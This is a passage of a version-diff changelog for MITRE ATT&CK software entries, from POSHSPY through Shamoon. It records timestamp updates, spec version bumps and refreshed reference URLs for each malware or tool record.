| modified | 2020-03-30 17:16:18.343000+00:00 | 2024-11-17 15:01:33.389000+00:00 |
| external_references[2]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0150] POSHSPY
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 17:16:53.396000+00:00 | 2025-04-16 20:38:11.901000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0145] POWERSOURCE
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-20 20:06:44.707000+00:00 | 2025-04-16 20:37:56.902000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0223] POWERSTATS
Current version: 2.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 05:13:46.664000+00:00 | 2025-04-16 20:38:40.984000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0371] POWERTON
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-25 16:21:36.260000+00:00 | 2025-04-16 20:38:41.138000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0184] POWRUNER
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-07-06 16:11:56.562000+00:00 | 2025-04-16 20:37:54.652000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0196] PUNCHBUGGY
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 13:31:34.134000+00:00 | 2025-04-16 20:38:11.382000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0197] PUNCHTRACK
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 13:31:34.134000+00:00 | 2025-04-16 20:38:34.395000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0664] Pandora
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-15 14:17:18.725000+00:00 | 2025-04-16 20:38:28.723000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0208] Pasam
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-01-06 19:32:28.265000+00:00 | 2024-11-17 19:55:07.592000+00:00 |
| external_references[2]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0122] Pass-The-Hash Toolkit
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:54.785000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0556] Pay2Key
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-22 02:48:54.019000+00:00 | 2025-04-16 20:38:18.273000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0683] Peirates
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-14 20:55:21.371000+00:00 | 2025-04-16 20:38:52.924000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0643] Peppy
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-15 15:09:54.978000+00:00 | 2025-04-16 20:38:15.700000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0517] Pillowmint
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-26 19:34:38.763000+00:00 | 2025-04-16 20:38:33.297000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0048] PinchDuke
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 17:21:09.930000+00:00 | 2025-04-16 20:38:30.358000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0097] Ping
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-06 15:12:11.358000+00:00 | 2025-04-16 20:38:55.518000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1031] PingPull
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 18:51:58.072000+00:00 | 2025-04-16 20:38:02.753000+00:00 |
| x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[S0124] Pisloader
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 17:21:44.379000+00:00 | 2025-04-16 20:38:32.474000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0012] PoisonIvy
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-19 14:30:03.923000+00:00 | 2024-11-17 19:55:07.591000+00:00 |
| external_references[8]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
| external_references[8]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
[S0518] PolyglotDuke
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-26 19:42:34.359000+00:00 | 2025-04-16 20:38:03.362000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0453] Pony
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-25 21:57:40.642000+00:00 | 2025-04-16 20:37:58.346000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0378] PoshC2
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-06-03 17:45:36.186000+00:00 | 2025-04-16 20:38:51.558000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1046] PowGoop
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-17 14:40:59.636000+00:00 | 2025-04-16 20:38:34.085000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0177] Power Loader
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:37:55.103000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0139] PowerDuke
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 17:22:08.256000+00:00 | 2025-04-16 20:37:51.754000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1012] PowerLess
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-28 17:21:55.473000+00:00 | 2025-04-16 20:38:02.412000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0685] PowerPunch
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 05:12:04.169000+00:00 | 2025-04-16 20:38:37.108000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0441] PowerShower
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-05-20 20:43:49.960000+00:00 | 2025-04-16 20:38:07.537000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0194] PowerSploit
Current version: 1.6
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-17 19:50:17.832000+00:00 | 2025-04-16 20:38:50.246000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0393] PowerStallion
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-02-09 14:05:19.246000+00:00 | 2025-04-16 20:38:38.238000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1058] Prestige
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-02-24 22:25:15.162000+00:00 | 2025-04-16 20:37:57.513000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0654] ProLock
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-15 21:35:09.832000+00:00 | 2024-11-17 23:58:37.273000+00:00 |
| external_references[1]['description'] | Group IB. (2020, September). LOCK LIKE A PRO. Retrieved September 27, 2021. | Group IB. (2020, September). LOCK LIKE A PRO. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://groupib.pathfactory.com/ransomware-reports/prolock_wp | https://web.archive.org/web/20220119114433/https://groupib.pathfactory.com/ransomware-reports/prolock_wp |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0279] Proton
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-01-22 16:19:40.969000+00:00 | 2025-04-16 20:38:34.550000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0238] Proxysvc
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 17:23:20.589000+00:00 | 2025-04-16 20:37:53.139000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0078] Psylo
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 17:23:59.127000+00:00 | 2025-04-16 20:38:39.039000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0147] Pteranodon
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-08-23 15:25:11.145000+00:00 | 2025-04-16 20:38:12.213000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0583] Pysa
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-27 20:19:31.430000+00:00 | 2025-04-16 20:38:27.874000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0269] QUADAGENT
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 05:20:12.492000+00:00 | 2025-04-16 20:38:19.712000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1076] QUIETCANARY
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-07-25 20:19:09.713000+00:00 | 2025-04-16 20:38:23.780000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0650] QakBot
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-17 16:10:03.901000+00:00 | 2024-11-17 13:02:32.758000+00:00 |
| external_references[7]['description'] | Trend Micro. (2020, December 17). QAKBOT: A decade-old malware still with new tricks. Retrieved September 27, 2021. | Trend Micro. (2020, December 17). QAKBOT: A decade-old malware still with new tricks. Retrieved November 17, 2024. |
| external_references[7]['url'] | https://success.trendmicro.com/solution/000283381 | https://success.trendmicro.com/en-US/solution/KA-0011282 |
[S0686] QuietSieve
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-15 12:31:52.469000+00:00 | 2025-04-16 20:37:52.215000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0055] RARSTONE
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 17:24:58.616000+00:00 | 2025-04-16 20:38:21.673000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0241] RATANKBA
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-09-02 18:46:32.365000+00:00 | 2025-04-16 20:38:26.215000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0495] RDAT
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-15 23:59:45.815000+00:00 | 2025-04-16 20:38:05.635000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0416] RDFSNIFFER
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-10-16 15:34:22.990000+00:00 | 2025-04-16 20:37:52.986000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0496] REvil
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-11 00:15:32.724000+00:00 | 2024-11-17 23:08:38.543000+00:00 |
| external_references[14]['description'] | Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved December 14, 2020. | Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved November 17, 2024. |
| external_references[14]['url'] | https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis | https://web.archive.org/web/20210414101816/https://tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis/ |
[S0258] RGDoor
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-09-10 18:59:39.228000+00:00 | 2025-04-16 20:38:32.672000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0003] RIPTIDE
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 17:28:04.217000+00:00 | 2025-04-16 20:38:30.044000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0112] ROCKBOOT
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-02-09 15:16:26.188000+00:00 | 2025-04-16 20:38:35.715000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0240] ROKRAT
Current version: 2.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30 20:40:21.212000+00:00 | 2025-04-16 20:38:12.531000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0148] RTM
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-29 19:51:00.660000+00:00 | 2025-04-16 20:38:23.633000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0481] Ragnar Locker
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-06 15:08:53.375000+00:00 | 2025-04-16 20:38:08.233000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0458] Ramsay
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-14 22:10:12.150000+00:00 | 2025-04-16 20:38:32.837000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0364] RawDisk
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-14 15:22:38.134000+00:00 | 2024-11-17 19:51:16.652000+00:00 |
| external_references[2]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf | https://web.archive.org/web/20160303200515/https:/operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf |
[S0169] RawPOS
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 03:01:39.526000+00:00 | 2025-04-16 20:38:24.883000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0075] Reg
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-13 20:23:35.333000+00:00 | 2025-04-16 20:38:56.474000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0511] RegDuke
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-24 21:24:58.468000+00:00 | 2025-04-16 20:38:04.977000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0332] Remcos
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-12-23 14:07:20.658000+00:00 | 2025-04-16 20:38:53.082000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0166] RemoteCMD
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-31 12:40:01.208000+00:00 | 2025-04-16 20:38:06.578000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0592] RemoteUtilities
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-25 23:30:38.375000+00:00 | 2025-04-16 20:38:49.636000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0174] Responder
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-17 14:01:57.617000+00:00 | 2025-04-16 20:38:54.639000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0379] Revenge RAT
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-02 23:04:26.238000+00:00 | 2024-11-17 23:54:41.761000+00:00 |
| external_references[1]['description'] | Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved May 1, 2019. | Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/ | https://web.archive.org/web/20200428173819/https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/ |
[S0400] RobbinHood
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:05:52.348000+00:00 | 2025-04-16 20:37:54.940000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0270] RogueRobin
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 05:24:35.812000+00:00 | 2025-04-16 20:38:22.307000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0090] Rover
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-17 14:52:20.206000+00:00 | 2025-04-16 20:38:15.344000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1071] Rubeus
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-03 18:30:05.885000+00:00 | 2025-04-16 20:38:56.949000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0358] Ruler
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-16 20:38:53.872000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0253] RunningRAT
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-04-21 23:09:31.043000+00:00 | 2025-04-16 20:38:12.728000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0446] Ryuk
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-09 18:11:35.634000+00:00 | 2025-04-16 20:38:27.373000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0085] S-Type
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-10 16:02:05.568000+00:00 | 2025-04-16 20:38:13.738000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0461] SDBbot
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-18 16:01:14.539000+00:00 | 2025-04-16 20:38:23.446000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0195] SDelete
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-08-12 21:37:53.804000+00:00 | 2025-04-16 20:38:56.799000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0185] SEASHARPEE
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-23 20:29:59.216000+00:00 | 2025-04-16 20:37:54.263000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0450] SHARPSTATS
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 05:29:42.303000+00:00 | 2025-04-16 20:38:17.168000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0028] SHIPSHAPE
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_aliases | | ['SHIPSHAPE'] |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2024-11-17 15:05:25.108000+00:00 |
| external_references[1]['description'] | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015. | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/05/20081935/rpt-apt30.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0063] SHOTPUT
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:09:41.437000+00:00 | 2025-04-16 20:38:09.918000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0217] SHUTTERSPEED
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-04 21:36:27.669000+00:00 | 2024-11-17 15:01:33.388000+00:00 |
| external_references[1]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
[S0218] SLOWDRIFT
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:10:33.691000+00:00 | 2024-11-17 15:01:33.387000+00:00 |
| external_references[2]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0649] SMOKEDHAM
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-14 23:43:40.206000+00:00 | 2025-04-16 20:38:19.381000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0159] SNUGRIDE
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:11:04.830000+00:00 | 2025-04-16 20:38:01.282000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0157] SOUNDBITE
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:11:45.403000+00:00 | 2025-04-16 20:38:26.524000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0035] SPACESHIP
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 03:05:20.517000+00:00 | 2024-11-17 15:05:25.107000+00:00 |
| external_references[1]['description'] | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015. | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/05/20081935/rpt-apt30.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0390] SQLRat
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 05:36:07.371000+00:00 | 2025-04-16 20:38:22.655000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1042] SUGARDUMP
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-04 21:03:54.834000+00:00 | 2025-04-16 20:38:26.373000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1049] SUGARUSH
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-04 21:50:36.241000+00:00 | 2025-04-16 20:38:04.465000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0562] SUNSPOT
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-27 20:02:20.344000+00:00 | 2025-04-16 20:38:33.634000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1064] SVCReady
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-18 12:41:37.940000+00:00 | 2025-04-16 20:38:16.488000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0464] SYSCON
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-21 15:16:57.038000+00:00 | 2025-04-16 20:38:41.948000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0053] SeaDuke
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-26 17:40:17.009000+00:00 | 2025-04-16 20:38:13.890000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0382] ServHelper
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-14 23:44:24.382000+00:00 | 2025-04-16 20:38:29.531000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0639] Seth-Locker
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-13 14:17:43.705000+00:00 | 2025-04-16 20:38:44.630000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0596] ShadowPad
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-26 20:09:03.093000+00:00 | 2025-04-16 20:38:41.797000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0140] Shamoon
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-08 20:53:17.332000+00:00 | 2024-11-17 16:07:44.262000+00:00 |
